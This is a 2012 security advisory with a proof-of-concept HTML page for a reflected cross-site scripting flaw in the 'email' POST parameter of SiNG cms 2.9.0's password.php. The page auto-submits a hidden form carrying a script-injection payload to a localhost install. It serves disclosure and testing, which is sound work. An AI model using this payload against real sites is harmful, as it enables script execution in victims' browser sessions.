<!DOCTYPE html>
<!--

SiNG cms 2.9.0 (email) Remote XSS POST Injection Vulnerability


Vendor: Simple Network Gear
Product web page: http://www.sing-cms.ru
Affected version: 2.9.0

Summary: SiNG cms is a free modular Content Management System open
source, based on a bunch of PHP / MySQL and intended use of the web
server Apache.

Desc: The application is prone to a reflected cross-site scripting
vulnerability due to a failure to properly sanitize user-supplied
input to the 'email' POST parameter in the 'password.php' script.
Attackers can exploit this weakness to execute arbitrary HTML and
script code in a user's browser session.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Vendor status:

[20.08.2012] Vulnerability discovered.
[20.08.2012] Initial contact with the vendor.
[22.08.2012] No response from the vendor.
[23.08.2012] Public security advisory released.


Advisory ID: ZSL-2012-5097
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5097.php


20.08.2012

-->


<html>
<head>
<title>SiNG cms 2.9.0 (email) Remote XSS POST Injection Vulnerability</title>
</head>
<body>
<form name="email" method="post" action="http://localhost/singcms/password.php">
<input type="hidden" name="email" value='"><script>alert("XSS");</script>' />
<input type="hidden" name="send" value="Send password" />
</form>
<script type="text/javascript">
document.email.submit();
</script>
</body>
</html>